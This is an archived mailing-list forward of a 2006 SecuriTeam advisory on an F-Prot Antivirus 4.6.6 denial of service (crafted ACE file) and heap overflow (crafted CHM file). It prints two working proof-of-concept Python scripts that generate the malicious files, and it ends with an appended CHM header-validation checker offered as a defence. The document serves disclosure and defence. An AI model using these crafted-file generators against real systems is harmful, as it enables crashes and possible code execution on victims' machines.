Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: [UNIX] F-Prot Antivirus Heap Overflow and DoS



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Thursday, December 07, 2006 6:28 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [UNIX] F-Prot Antivirus Heap Overflow and DoS
> 
> 
> F-Prot Antivirus Heap Overflow and DoS 
> 
> 
> 
> Two vulnerabilities in F-Prot Antivirus
> <http://www.f-prot.com/download/home_user/download_fplinux.html> 4.6.6
> for Unix platforms could allow a remote attacker to cause a DoS or
> execute arbitrary code.
> 
> 
> 1. ACE file Denial of Service
> When parsing a specially crafted ACE compressed file, F-Prot Antivirus
> will enter an infinite loop.
> See fprot1.py for more details.
>
> 2. CHM file heap overflow
> When parsing a specially crafted CHM file, a heap overflow will occur
> in F-Prot Antivirus.
> See fprot2.py for more details.
> 
> Vendor Status: 
> Update to F-Prot version 4.6.7: 
> http://www.f-prot.com/news/gen_news/061201_release_unix467.html 
> 
> Exploits: 
> # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS 
> # 
> # Copyright (c) 2006 Evgeny Legerov 
> # 
> # Permission to use, copy, modify, and distribute this software for any
> # purpose with or without fee is hereby granted, provided that the above
> # copyright notice and this permission notice appear in all copies.
> #
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
> # 
> # To test this code on Linux: 
> # 
> # create ACE compressed file 
> # $ ./fprot1.py > 1.ace 
> # $ f-prot 1.ace 
> 
> import sys 
> import struct 
> 
> ACE=""" 
>  58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 
>  02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a 
>  55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 
>  53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 
>  00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 
>  02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 
>  41 41 41 41 41 
> """ 
> 
> s = "" 
> for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]:
>         s += i
> 
> sys.stdout.write(s) 
> 
> # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
> # overflow
> # 
> # Copyright (c) 2006 Evgeny Legerov 
> # 
> # Permission to use, copy, modify, and distribute this software for any
> # purpose with or without fee is hereby granted, provided that the above
> # copyright notice and this permission notice appear in all copies.
> #
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
> # 
> # $ ./fprot2.py > 1.chm 
> # $ f-prot 1.chm 
> 
> import sys 
> import struct 
> 
> s="" 
> s+="ITSF" # signature 
> s+=struct.pack("<L",3) # version 
> s+=struct.pack("<L",96) # header_len 
> s+=struct.pack("<L",1) # unknown 
> s+=struct.pack("<L",0x41424344) # last_modified 
> s+=struct.pack("<L",0x419) # lang_id 
> s+="A"*16 #dir_clsid 
> s+="B"*16 #stream_clsid 
> s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset 
> s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len 
> s+=struct.pack("<L",120) + "\x00" *4 #dir_offset 
> s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len 
> s+=struct.pack("<L",4300) + "\x00"*4 #data_offset 
> s+="A"*24 
> s+="ITSP" 
> s+=struct.pack("<L", 1) # version 
> s+=struct.pack("<L",0x54) # header_len 
> s+=struct.pack("<L", 0xa) # unknown 
> s+=struct.pack("<L",1000) # block_len - BUG? 
> s+=struct.pack("<L",2) # blockidx 
> s+=struct.pack("<L", 1) # index_depth 
> s+=struct.pack("<L", -1) # index_root 
> s+=struct.pack("<L",0) # index_head 
> s+=struct.pack("<L",0) # index_tail 
> s+=struct.pack("<L", -1) # unknown2 
> s+=struct.pack("<L",1) # num_blocks 
> s+=struct.pack("<L", 1033) # lang_id 
> s+="A"*32 
> s+="B"*10000 
> 
> sys.stdout.write(s) 
> 
> 
> Additional Information: 
> The original article can be found at: 
> http://gleg.net/fprot.txt 
> 
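A defensive counterpart to the CHM case in the advisory, added here as an example (it is not part of the advisory, of fprot2.py, or of F-Prot): a pre-parse consistency check over the ITSF/ITSP header fields that fprot2.py names. The rule that `dir_len` must equal `header_len + num_blocks * block_len`, the index range checks, and the `build_sample` helper are assumptions made for illustration; the sample file is constructed.

```python
import struct

# Field order follows the ITSF/ITSP layout spelled out in the fprot2.py comments.
ITSF = struct.Struct("<4s5L16s16s5Q")  # 96 bytes, ends: sec0 off/len, dir off/len, data_offset
ITSP = struct.Struct("<4s6L4l2L")      # first 52 bytes, up to and including lang_id

def check_chm(data: bytes) -> list:
    """Return structural problems found in the CHM headers (empty list = consistent)."""
    if len(data) < ITSF.size:
        return ["file shorter than the ITSF header"]
    (sig, _ver, _hlen, _unk, _mtime, _lang, _dclsid, _sclsid,
     sec0_off, sec0_len, dir_off, dir_len, data_off) = ITSF.unpack_from(data)
    if sig != b"ITSF":
        return ["missing ITSF signature"]
    problems = []
    for name, off, length in (("sec0", sec0_off, sec0_len), ("dir", dir_off, dir_len)):
        if off + length > len(data):
            problems.append(f"{name} section extends past end of file")
    if data_off > len(data):
        problems.append("data_offset past end of file")
    if dir_off + ITSP.size > len(data):
        return problems + ["no room for the ITSP header at dir_offset"]
    (psig, _pver, phdr_len, _punk, block_len, _idx, _depth, index_root,
     index_head, index_tail, _unk2, num_blocks, _plang) = ITSP.unpack_from(data, dir_off)
    if psig != b"ITSP":
        return problems + ["missing ITSP signature at dir_offset"]
    # Assumption: the directory is exactly the ITSP header plus num_blocks
    # blocks of block_len bytes, so buffer sizes derived from either must agree.
    if phdr_len + num_blocks * block_len != dir_len:
        problems.append("dir_len disagrees with header_len + num_blocks * block_len")
    for name, idx, allow_none in (("index_root", index_root, True),
                                  ("index_head", index_head, False),
                                  ("index_tail", index_tail, False)):
        if not (0 <= idx < num_blocks or (allow_none and idx == -1)):
            problems.append(f"{name} is not a valid block number")
    return problems

def build_sample(block_len: int = 4096, num_blocks: int = 1) -> bytearray:
    """Constructed sample: consistent headers followed by zero-filled blocks."""
    dir_len = 0x54 + num_blocks * block_len
    itsf = ITSF.pack(b"ITSF", 3, 96, 1, 0, 0x409, bytes(16), bytes(16),
                     96, 24, 120, dir_len, 120 + dir_len)
    itsp = ITSP.pack(b"ITSP", 1, 0x54, 0xA, block_len, 2, 1, -1, 0, 0, -1,
                     num_blocks, 0x409).ljust(0x54, b"\0")
    return bytearray(itsf + bytes(24) + itsp + bytes(num_blocks * block_len))
```

A scanner or mail gateway can run a check like this before handing the file to a CHM unpacker and treat any finding as a reason to quarantine rather than parse.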



 



